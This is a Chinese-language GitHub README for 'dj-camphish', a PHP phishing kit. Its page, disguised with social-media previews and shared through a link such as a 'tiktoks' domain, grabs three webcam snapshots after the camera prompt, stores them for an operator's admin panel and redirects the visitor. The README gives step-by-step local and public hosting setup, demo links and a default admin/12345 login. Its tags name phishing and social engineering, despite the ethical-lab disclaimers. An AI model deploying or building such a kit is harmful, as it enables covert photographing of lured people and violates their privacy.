rootuserdj/dj-camphish

---

## 🚀 概述 `dj-camphish` 是一个易于使用的基于浏览器的工具包，用于捕获网络摄像头快照（需获得用户许可）并将用户重定向到自定义 URL。它专为**道德黑客实验室**、**OSINT 培训**和**隐私教育**而设计，配备了一个简单的管理面板来管理捕获内容和设置。非常适合初学者和专业人士！ **重要提示**：在捕获图像之前，请务必获得用户的同意。仅在受控的、符合道德规范的环境中使用。 ## ✨ 功能 - 📷 **网络摄像头捕获**：在获得用户许可的情况下拍摄快照。 - ⚙️ **管理面板**：查看、删除或下载捕获内容；设置重定向 URL 和缩略图。 - 📱 **响应式设计**：适用于移动端和桌面端，具有简洁的 Tailwind CSS 界面。 - 🔒 **安全**：内置 CSRF 保护，确保管理操作的安全。 - 🖼️ **社交预览**：添加自定义缩略图 (1200x630) 以便在分享链接时使用。 - 🛠️ **易于设置**：在本地 (XAMPP) 或托管服务器 (cPanel) 上运行，无需端口转发。 - 🎯 **对初学者友好**：对于新手用户没有复杂的设置。 - 💾 **图像管理**：将捕获的图像保存到服务器、删除或下载为 ZIP 文件。 ## 📁 项目结构 ``` dj-camphish/ ├── index.php # Capture page with loader & social meta tags ├── capture.js # Webcam capture script ├── save.php # Saves images to server ├── config.php # Settings for captures and security ├── gallery.php # Admin panel (login: admin/12345) ├── delete_images.php # Deletes selected images ├── download_images.php # Downloads images (single or ZIP) ├── update_redirect.php # Updates redirect URL & thumbnail ├── get_csrf_token.php # Handles secure tokens ├── logout.php # Logs out admins ├── redirect.txt # Stores redirect URL ├── thumbnail.png # Social media thumbnail (1200x630) ├── fallback.png # Backup thumbnail ├── logs.txt # Logs errors and actions └── captures/ # Stores images (e.g., 68e8c7736e5de.png) ``` ## 🚀 快速开始 ### 1. 在本地运行 (XAMPP) 无需端口转发！使用 XAMPP 即可轻松完成本地设置。 1. **安装 XAMPP**： - 从 [xampp.org](https://www.apachefriends.org/) 下载适用于 Windows、macOS 或 Linux 的 XAMPP。 - 安装并启动 Apache 和 PHP。 2. **设置项目**： - 将 `dj-camphish` 文件夹复制到 `C:\xampp\htdocs\` (Windows) 或 `/opt/lampp/htdocs/` (Linux/macOS)。 - 设置权限 (Linux/macOS)： chmod 755 htdocs/dj-camphish/captures/ chmod 644 htdocs/dj-camphish/redirect.txt htdocs/dj-camphish/logs.txt chmod 644 htdocs/dj-camphish/thumbnail.png htdocs/dj-camphish/fallback.png 3. **访问**： - 打开 `http://localhost/dj-camphish/` 访问捕获页面。 - 转到 `http://localhost/dj-camphish/gallery.php` 访问管理面板。 - 登录信息：**用户名**：`admin`，**密码**：`12345`。 ### 2. 部署在虚拟主机上 (cPanel) 使用任何兼容 PHP 的虚拟主机在线部署，无需进行端口转发。 1. **上传文件**： - 登录到 cPanel（例如，通过您的托管服务提供商）。 - 转到文件管理器 → `public_html`。 - 上传 `dj-camphish` 文件夹或 ZIP 压缩包并解压。 2. **设置权限**： - 在文件管理器中，设置： - `captures/` 文件夹：755（可写入）。 - `redirect.txt`、`logs.txt`、`thumbnail.png`、`fallback.png`：644。 3. **访问**： - 捕获页面：`yourdomain.com/dj-camphish/`。 - 管理面板：`yourdomain.com/dj-camphish/gallery.php`（登录信息：admin/12345）。 - 演示：[https://tiktoks.wuaze.com/](https://hms.42web.io/DJ-Camphish/) | [https://tiktoks.wuaze.com/gallery.php](https://hms.42web.io/DJ-Camphish/gallery.php)。 ### 3. 用法 1. 分享捕获 URL（例如：`https://tiktoks.wuaze.com/`）。 2. 用户允许访问网络摄像头 → 拍摄 3 张快照（间隔 1.5 秒） → 保存到 `captures/`。 3. 用户被重定向到 `redirect.txt` 中的 URL。 4. 登录到 `gallery.php` 查看、删除或下载图像。 ## 📱 截图 ### 1. 捕获界面 ### 2. 管理控制台 ### 3. 设置模态框 ## ⚙️ 配置 - **无需更改 CSRF 设置**：`config.php` 中默认的 `csrf_secret` 开箱即用。 - **捕获设置** (`config.php`)： 'capture' => [ 'max_captures' => 3, // Number of snapshots 'interval_ms' => 1500, // Delay between snapshots (ms) 'canvas_width' => 640, // Image width 'canvas_height' => 480, // Image height ], - **管理面板** (`gallery.php`)： - 设置重定向 URL（例如：`https://example.com`）。 - 上传缩略图（1200x630 PNG/JPG）以用于社交预览。 - **日志记录**：错误和操作会保存到 `logs.txt` 中。 ## 🛡️ 安全建议 - **修改密码**：在生产环境中，请务必更新 `config.php` 中的 `admin/12345`。 - **使用 HTTPS**：部署在安全的域名下（例如：`https://tiktoks.wuaze.com/`）。 - **权限**：确保只有 `captures/` 和日志文件是可写的。 - **同意**：在访问网络摄像头之前，请务必获得用户的明确许可。 ## 🔧 故障排除 | 问题 | 解决方案 | |-------|----------| | **图像未保存** | 检查 `captures/` 的权限 (`chmod 755`) | | **登录失败** | 检查 `config.php` 中是否为 `admin/12345` | | **缺少缩略图** | 通过 `gallery.php` 上传 1200x630 尺寸的图像 | | **下载问题** | 在 `php.ini` 中启用 PHP `zip` 扩展 | **日志**：检查 `logs.txt` 以排查错误（例如 CSRF 或文件相关问题）。 ## ⚖️ 法律声明 ## 👨‍💻 联系方式 **Dhananjay Sah** 📞 +977 9824204425 ✉️ [rootuserdj@gmail.com](mailto:rootuserdj@gmail.com) 🌐 [GitHub](https://github.com/rootuserdj) **支持**：如需帮助，请提交 [issue](https://github.com/rootuserdj/dj-camphish/issues)。 ## 📄 许可证 [](https://opensource.org/licenses/MIT) 基于 [MIT License](LICENSE) 授权。

标签：ESC8, ffuf, Object Callbacks, OpenVAS, PHP, 命令控制, 数据可视化, 数据采集, 社会工程学, 网络钓鱼, 隐私获取